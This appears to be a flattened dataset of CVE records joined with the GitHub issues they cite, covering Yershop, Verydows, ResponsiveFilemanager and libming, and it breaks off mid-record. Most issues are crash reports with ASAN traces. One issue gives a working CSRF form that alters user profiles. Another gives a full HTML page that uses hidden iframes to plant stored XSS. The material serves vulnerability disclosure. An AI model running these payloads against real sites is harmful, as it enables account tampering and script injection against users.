Case 4: http://www.dp378.cn/index.php/index/index/index.html
Landing place: http://www.dp378.cn/index.php/index/user/login.html
Personal information change: http://www.dp378.cn/index.php/index/member/edit.html
Case 5: https://demo.yershop.com/index.php/index/index/index.html
Landing place: https://demo.yershop.com/index.php/index/user/login.html
Personal information change: https://demo.yershop.com/index.php/index/user/edit.html
Case 6: http://www.girltoo.com/
Landing place: http://www.girltoo.com/index.php?s=/Home/User/login.html
Personal information change: http://www.girltoo.com/index.php?s=/Home/center/information.html | Beyond authority loophole in Yershop | https://api.github.com/repos/huyiwill/shopcms_lang/issues/1/comments | 0 | 2020-05-21T14:42:48Z | 2020-05-21T14:43:58Z | https://github.com/huyiwill/shopcms_lang/issues/1 | 622,548,363 | 1 | 5,096 |
CVE-2020-23363 | 2023-05-09T16:15:14.090 | Cross Site Request Forgery (CSRF) vulnerability found in Verytops Verydows all versions that allows an attacker to execute arbitrary code via a crafted script. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/Verytops/verydows/issues/17"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/Verytops/verydows/issues/17"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:verydows:verydows:-:*:*:*:*:*:*:*",
"matchCriteriaId": "88077CEC-9C13-4061-9A3C-AB0E61FF0587",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"352"
] | 352 | https://github.com/Verytops/verydows/issues/17 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"Verytops",
"verydows"
] | There is a CSRF vulnerability that allows information and other operations to be changed
[http://dcbang.net/QQ.PNG](url)
POC:
`<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://demo.verydows.com/user/profile.html?step=update" method="POST">
<input type="hidden" name="nickname" value="马?¤§?“ˆ" />
<input type="hidden" name="qq" value="1332597938" />
<input type="hidden" name="gender" value="0" />
<input type="hidden" name="birth_year" value="1920" />
<input type="hidden" name="birth_month" value="1" />
<input type="hidden" name="birth_day" value="1" />
<input type="hidden" name="signature" value="AA" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
` | Existence CSRF Vulnerability | https://api.github.com/repos/Verytops/verydows/issues/17/comments | 1 | 2020-06-11T15:51:50Z | 2020-06-11T15:59:19Z | https://github.com/Verytops/verydows/issues/17 | 637,134,811 | 17 | 5,097 |
CVE-2021-31240 | 2023-05-09T16:15:14.147 | An issue found in libming v.0.4.8 allows a local attacker to execute arbitrary code via the parseSWF_IMPORTASSETS function in the parser.c file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/218"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/218"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*",
"matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"401"
] | 401 | https://github.com/libming/libming/issues/218 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"libming",
"libming"
] | Hi, I found a memory leak problem.
version: 0.4.8
command: swftophp poc
poc:
[parser.c_2556.zip](https://github.com/libming/libming/files/6276040/parser.c_2556.zip)
Here is the report from ASAN:
```
`header indicates a filesize of 761 but filesize is 550
<?php
$m = new SWFMovie(8);
ming_setscale(1.0);
$m->setRate(192.371094);
$m->setDimension(-13061, -13172);
/* Note: xMin and/or yMin are not 0! */
$m->setFrames(49344);
/*Unknown block type 803*/
/*Unknown block type 16*/
/*Unknown block type 307*/
/*Unknown block type 493*/
/*Unknown block type 846*/
/*Unknown block type 897*/
/*Unknown block type 927*/
/*Unknown block type 898*/
/*Unknown block type 523*/
Stream out of sync after parse of blocktype 57 (SWF_IMPORTASSETS). 332 but expecting 340.
/* SWF_IMPORTASSETS */
/*Unknown block type 970*/
/*Unknown block type 401*/
truncated file
=================================================================
==52194==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 269 byte(s) in 10 object(s) allocated from:
#0 0x4d2558 in malloc /home/radon/build/llvm_tools/llvm-4.0.0.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:66
#1 0x595d03 in readBytes /home/radon/Documents/subject/Delta/Type2/libming/libming-CVE-2018-8962/obj-aflgo/util/../../util/read.c:227:17
#2 0x594308 in parseSWF_UNKNOWNBLOCK /home/radon/Documents/subject/Delta/Type2/libming/libming-CVE-2018-8962/obj-aflgo/util/../../util/parser.c:3551:28
#3 0x5296d1 in blockParse /home/radon/Documents/subject/Delta/Type2/libming/libming-CVE-2018-8962/obj-aflgo/util/../../util/blocktypes.c:148:10
#4 0x52831b in readMovie /home/radon/Documents/subject/Delta/Type2/libming/libming-CVE-2018-8962/obj-aflgo/util/../../util/main.c:265:11
#5 0x526bbc in main /home/radon/Documents/subject/Delta/Type2/libming/libming-CVE-2018-8962/obj-aflgo/util/../../util/main.c:350:2
#6 0x7f4aeee7e83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
Direct leak of 256 byte(s) in 1 object(s) allocated from:
#0 0x4d2558 in malloc /home/radon/build/llvm_tools/llvm-4.0.0.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:66
#1 0x595edf in readString /home/radon/Documents/subject/Delta/Type2/libming/libming-CVE-2018-8962/obj-aflgo/util/../../util/read.c:242:17
#2 0x580725 in parseSWF_IMPORTASSETS /home/radon/Documents/subject/Delta/Type2/libming/libming-CVE-2018-8962/obj-aflgo/util/../../util/parser.c:2553:20
#3 0x529615 in blockParse /home/radon/Documents/subject/Delta/Type2/libming/libming-CVE-2018-8962/obj-aflgo/util/../../util/blocktypes.c:145:14
#4 0x52831b in readMovie /home/radon/Documents/subject/Delta/Type2/libming/libming-CVE-2018-8962/obj-aflgo/util/../../util/main.c:265:11
#5 0x526bbc in main /home/radon/Documents/subject/Delta/Type2/libming/libming-CVE-2018-8962/obj-aflgo/util/../../util/main.c:350:2
#6 0x7f4aeee7e83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
Direct leak of 1 byte(s) in 1 object(s) allocated from:
#0 0x4d2558 in malloc /home/radon/build/llvm_tools/llvm-4.0.0.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:66
#1 0x580908 in parseSWF_IMPORTASSETS /home/radon/Documents/subject/Delta/Type2/libming/libming-CVE-2018-8962/obj-aflgo/util/../../util/parser.c:2556:32
#2 0x529615 in blockParse /home/radon/Documents/subject/Delta/Type2/libming/libming-CVE-2018-8962/obj-aflgo/util/../../util/blocktypes.c:145:14
#3 0x52831b in readMovie /home/radon/Documents/subject/Delta/Type2/libming/libming-CVE-2018-8962/obj-aflgo/util/../../util/main.c:265:11
#4 0x526bbc in main /home/radon/Documents/subject/Delta/Type2/libming/libming-CVE-2018-8962/obj-aflgo/util/../../util/main.c:350:2
#5 0x7f4aeee7e83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
Direct leak of 1 byte(s) in 1 object(s) allocated from:
#0 0x4d2558 in malloc /home/radon/build/llvm_tools/llvm-4.0.0.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:66
#1 0x580850 in parseSWF_IMPORTASSETS /home/radon/Documents/subject/Delta/Type2/libming/libming-CVE-2018-8962/obj-aflgo/util/../../util/parser.c:2555:29
#2 0x529615 in blockParse /home/radon/Documents/subject/Delta/Type2/libming/libming-CVE-2018-8962/obj-aflgo/util/../../util/blocktypes.c:145:14
#3 0x52831b in readMovie /home/radon/Documents/subject/Delta/Type2/libming/libming-CVE-2018-8962/obj-aflgo/util/../../util/main.c:265:11
#4 0x526bbc in main /home/radon/Documents/subject/Delta/Type2/libming/libming-CVE-2018-8962/obj-aflgo/util/../../util/main.c:350:2
#5 0x7f4aeee7e83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
SUMMARY: AddressSanitizer: 527 byte(s) leaked in 13 allocation(s).
```
| Memory leaks in parseSWF_IMPORTASSETS | https://api.github.com/repos/libming/libming/issues/218/comments | 0 | 2021-04-08T04:46:50Z | 2021-04-08T04:46:50Z | https://github.com/libming/libming/issues/218 | 853,054,686 | 218 | 5,098 |
CVE-2021-31711 | 2023-05-09T16:15:14.197 | Cross Site Scripting vulnerability found in Trippo ResponsiveFilemanager v.9.14.0 and before allows a remote attacker to execute arbitrary code via the sort_by parameter in the dialog.php file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/trippo/ResponsiveFilemanager/issues/661"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/trippo/ResponsiveFilemanager/issues/661"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:responsivefilemanager:responsivefilemanager:*:*:*:*:*:*:*:*",
"matchCriteriaId": "097E3AFD-7F03-4CD4-B4BB-6B73C8622F63",
"versionEndExcluding": null,
"versionEndIncluding": "9.4.10",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/trippo/ResponsiveFilemanager/issues/661 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"trippo",
"ResponsiveFilemanager"
] | After taking another look at the ResponsiveFilemanager 9.14.0 i noticed that in the dialog.php file on line 229 that if the $_SESSION['RF']['sort_by'] is already set that there would not be done any validation.
https://github.com/trippo/ResponsiveFilemanager/blob/master/filemanager/dialog.php#L235
This created a problem because in ajax_calls.php in the "sort" action in the "sort_by" parameter it is possible to set that value without any validation.
https://github.com/trippo/ResponsiveFilemanager/blob/master/filemanager/ajax_calls.php#L73
This means if you would first request a session by going to the dialog.php, than going to the ajax_calls.php and request the sort action and as "sort_by" parameter you give a html tag.
Than if you done al that go back to the dialog.php page than $_SESSION['RF']["sort_by"] would be read and unescaped placed on all places where $sort_by is used what created stored xss until the session isn't valid anymore.
A very simple patch would be to add fix_get_params() in the dialog.php on line 235 when the $sort_by is set.
https://github.com/trippo/ResponsiveFilemanager/blob/master/filemanager/dialog.php#L235
I made a simple html file you can use to validate this vulnerability.
It is made for Firefox because it does make use of iframe's and a clickjacking vulnerability but if the session was already set than this would also work in other browsers with a miner change.
you would need to change all "http://192.168.0.11:3001" to your website.
When runned it would make 3 iframe's.
One to request the dialog.php file to get a PHPSESSID and to set $_SESSION['RF']["verify"] as RESPONSIVEfilemanager.
Second it would open the ajax_calls.php to set the html tag.
And tirth it reopens the dialog.php page to trigger the stored xss:
```html
<!DOCTYPE html>
<html>
<head>
<script>
var url = "http://192.168.0.11:3001";
/**
Execute the "sort" action in ajax_calls.php and set as "sort_by" a html tag.
This will set $_SESSION['RF']["sort_by"] on line 73 as my html tag.
https://github.com/trippo/ResponsiveFilemanager/blob/28d55f22f49c5592fcb15b9601c3defbc46b89de/filemanager/ajax_calls.php#L73
**/
function iframe1(){
var ifrm = document.createElement("iframe");
ifrm.setAttribute("src", url+"/filemanager/ajax_calls.php?action=sort&sort_by=%22%3E%3Cimg/src=%27x%27/onerror=alert(document.domain)%3E", "myWindow", "width=200, height=100");
ifrm.setAttribute("onload", "iframe2();");
ifrm.setAttribute("style", "visibility: hidden;");
ifrm.style.width = "640px";
ifrm.style.height = "480px";
document.body.appendChild(ifrm);
}
/**
Go back to the dialog.php to trigger a xss starting at line 235 because when $_SESSION['RF']["sort_by"] is already set and the sort_by parameter isn't set than it would use the data from $_SESSION['RF']["sort_by"].
And if sort_by isn't set than it won't execute fix_get_params() what would prevented xss.
because in ajax_calls.php this value wasn't sanitized with fix_get_params() when we setted the $_SESSION['RF']["sort_by"] there is a stored xss until the session is expired.
https://github.com/trippo/ResponsiveFilemanager/blob/28d55f22f49c5592fcb15b9601c3defbc46b89de/filemanager/dialog.php#L235
https://github.com/trippo/ResponsiveFilemanager/blob/28d55f22f49c5592fcb15b9601c3defbc46b89de/filemanager/include/utils.php#L686
**/
function iframe2(){
var ifrm1 = document.createElement("iframe");
ifrm1.setAttribute("src", url+"/filemanager/dialog.php?type=0&lang=en_EN&popup=0&crossdomain=0&relative_url=0&akey=key&fldr=/", "myWindow", "width=200, height=100");
ifrm1.setAttribute("style", "visibility: hidden;");
ifrm1.style.width = "640px";
ifrm1.style.height = "480px";
document.body.appendChild(ifrm1);
}
</script>
</head>
<body>
<!--
create a iframe to the dialog webpage to receive a PHPSESSID and to set $_SESSION['RF']["verify"] as RESPONSIVEfilemanager.
https://github.com/trippo/ResponsiveFilemanager/blob/28d55f22f49c5592fcb15b9601c3defbc46b89de/filemanager/dialog.php#L19
if we would not do that this exploit would fail in ajax_calls.php on line 7.
https://github.com/trippo/ResponsiveFilemanager/blob/28d55f22f49c5592fcb15b9601c3defbc46b89de/filemanager/ajax_calls.php#L7
-->
<iframe src="http://192.168.0.11:3001/filemanager/dialog.php?type=0&lang=en_EN&popup=0&crossdomain=0&relative_url=0&akey=key&fldr=/", width=200, height=100 onload="iframe1();" style="visibility: hidden;" sandbox>
</body>
</html>
```
A CVE has been requested. | Stored xss in v9.14.0 in dialog.php in $_SESSION['RF']["sort_by"] because of no validation if ajax_calls.php setted this session. | https://api.github.com/repos/trippo/ResponsiveFilemanager/issues/661/comments | 0 | 2021-04-19T15:54:05Z | 2021-04-19T18:43:04Z | https://github.com/trippo/ResponsiveFilemanager/issues/661 | 861,465,010 | 661 | 5,099 |
CVE-2023-30083 | 2023-05-09T16:15:14.373 | Buffer Overflow vulnerability found in Libming swftophp v.0.4.8 allows a local attacker to cause a denial of service via the newVar_N in util/decompile.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/266"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/266"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*",
"matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/libming/libming/issues/266 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"libming",
"libming"
] | Heap buffer overflow in the latest version of libming at function newVar_N in util/decompile.c:654.
## Environment
Ubuntu 18.04, 64 bit
libming 0.4.8
## Steps to reproduce
1. download file
```
wget https://github.com/libming/libming/archive/refs/tags/ming-0_4_8.tar.gz
tar -zxvf ming-0_4_8.tar.gz
```
2. compile libming with ASAN
```
cd libming-ming-0_4_8
./autogen.sh
export FORCE_UNSAFE_CONFIGURE=1
export LLVM_COMPILER=clang
CC=wllvm CXX=wllvm++ CFLAGS="-g -O0 -fcommon -Wno-error" ./configure --prefix=`pwd`/obj-bc --with-php-config=/usr/bin/php-config7.2 --enable-static --disable-shared
make
make install
cd obj-bc/bin/
extract-bc swftophp
clang -fsanitize=address -lz -lm swftophp.bc -o swftophp_asan
```
3. command for reproducing the error
```
./swftophp_asan poc
```
Download poc:
[libming_0-4-8_swftophp_heap-buffer-overflow_decompile654.zip](https://github.com/libming/libming/files/11025531/libming_0-4-8_swftophp_heap-buffer-overflow_decompile654.zip)
## ASAN report
```
root@2413df779df0:~/compiler1804/libming-ming-0_4_8/obj-bc/bin# ./swftophp_asan libming_0-4-8_swftophp_heap-buffer-overflow_decompile654.swf
header indicates a filesize of 0 but filesize is 166
<?php
$m = new SWFMovie(0);
ming_setscale(1.0);
$m->setRate(0.000000);
$m->setDimension(0, 1);
/* Note: xMin and/or yMin are not 0! */
$m->setFrames(0);
/* SWF_DOACTION */
16:SWFACTION_FSCOMMAND2
Can't get int for type: 10
=================================================================
==60490==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000001880 at pc 0x000000439494 bp 0x7ffd310a9d90 sp 0x7ffd310a9540
READ of size 1025 at 0x619000001880 thread T0
#0 0x439493 in __interceptor_strlen.part.36 /root/LLVM/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:372
#1 0x5022e5 in newVar_N /root/compiler1804/libming-ming-0_4_8/util/decompile.c:654:11
#2 0x4fbe07 in decompileNEWOBJECT /root/compiler1804/libming-ming-0_4_8/util/decompile.c:1588:7
#3 0x4fab64 in decompileAction /root/compiler1804/libming-ming-0_4_8/util/decompile.c:3190:3
#4 0x501b27 in decompileActions /root/compiler1804/libming-ming-0_4_8/util/decompile.c:3401:6
#5 0x503b31 in decompile5Action /root/compiler1804/libming-ming-0_4_8/util/decompile.c:3423:2
#6 0x4f7865 in outputSWF_DOACTION /root/compiler1804/libming-ming-0_4_8/util/outputscript.c:1548:29
#7 0x4f72ac in outputBlock /root/compiler1804/libming-ming-0_4_8/util/outputscript.c:2079:4
#8 0x4f9d21 in readMovie /root/compiler1804/libming-ming-0_4_8/util/main.c:277:4
#9 0x4f984d in main /root/compiler1804/libming-ming-0_4_8/util/main.c:350:2
#10 0x7fe2276bdc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
#11 0x41b8d9 in _start (/root/compiler1804/libming-ming-0_4_8/obj-bc/bin/swftophp_asan+0x41b8d9)
0x619000001880 is located 0 bytes to the right of 1024-byte region [0x619000001480,0x619000001880)
allocated by thread T0 here:
#0 0x4ae288 in realloc /root/LLVM/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:164
#1 0x502330 in newVar_N /root/compiler1804/libming-ming-0_4_8/util/decompile.c:657:18
#2 0x4fbe07 in decompileNEWOBJECT /root/compiler1804/libming-ming-0_4_8/util/decompile.c:1588:7
#3 0x4fab64 in decompileAction /root/compiler1804/libming-ming-0_4_8/util/decompile.c:3190:3
#4 0x501b27 in decompileActions /root/compiler1804/libming-ming-0_4_8/util/decompile.c:3401:6
#5 0x503b31 in decompile5Action /root/compiler1804/libming-ming-0_4_8/util/decompile.c:3423:2
#6 0x4f7865 in outputSWF_DOACTION /root/compiler1804/libming-ming-0_4_8/util/outputscript.c:1548:29
#7 0x4f72ac in outputBlock /root/compiler1804/libming-ming-0_4_8/util/outputscript.c:2079:4
#8 0x4f9d21 in readMovie /root/compiler1804/libming-ming-0_4_8/util/main.c:277:4
#9 0x4f984d in main /root/compiler1804/libming-ming-0_4_8/util/main.c:350:2
#10 0x7fe2276bdc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
SUMMARY: AddressSanitizer: heap-buffer-overflow /root/LLVM/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:372 in __interceptor_strlen.part.36
Shadow bytes around the buggy address:
0x0c327fff82c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff82d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff82e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff82f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff8300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c327fff8310:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8320: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8330: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==60490==ABORTING
``` | Heap buffer overflow in newVar_N() at decompile.c:654 | https://api.github.com/repos/libming/libming/issues/266/comments | 0 | 2023-03-21T06:45:54Z | 2023-03-21T06:45:54Z | https://github.com/libming/libming/issues/266 | 1,633,318,454 | 266 | 5,100 |
CVE-2023-30084 | 2023-05-09T16:15:14.423 | An issue found in libming swftophp v.0.4.8 allows a local attacker to cause a denial of service via the stackVal function in util/decompile.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/268"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/268"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*",
"matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"125"
] | 125 | https://github.com/libming/libming/issues/268 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"libming",
"libming"
] | Invalid memory read in the latest version of libming at function stackVal in util/decompile.c:1238.
## Environment
Ubuntu 18.04, 64 bit
libming 0.4.8
## Steps to reproduce
1. download file
```
wget https://github.com/libming/libming/archive/refs/tags/ming-0_4_8.tar.gz
tar -zxvf ming-0_4_8.tar.gz
```
2. compile libming with ASAN
```
cd libming-ming-0_4_8
./autogen.sh
export FORCE_UNSAFE_CONFIGURE=1
export LLVM_COMPILER=clang
CC=wllvm CXX=wllvm++ CFLAGS="-g -O0 -fcommon -Wno-error" ./configure --prefix=`pwd`/obj-bc --with-php-config=/usr/bin/php-config7.2 --enable-static --disable-shared
make
make install
cd obj-bc/bin/
extract-bc swftophp
clang -fsanitize=address -lz -lm swftophp.bc -o swftophp_asan
```
3. command for reproducing the error
```
./swftophp_asan poc
```
Download poc: [libming_0-4-8_swftophp_invalid-memory-read_decompile1238.zip](https://github.com/libming/libming/files/11025547/libming_0-4-8_swftophp_invalid-memory-read_decompile1238.zip)
## ASAN report
```
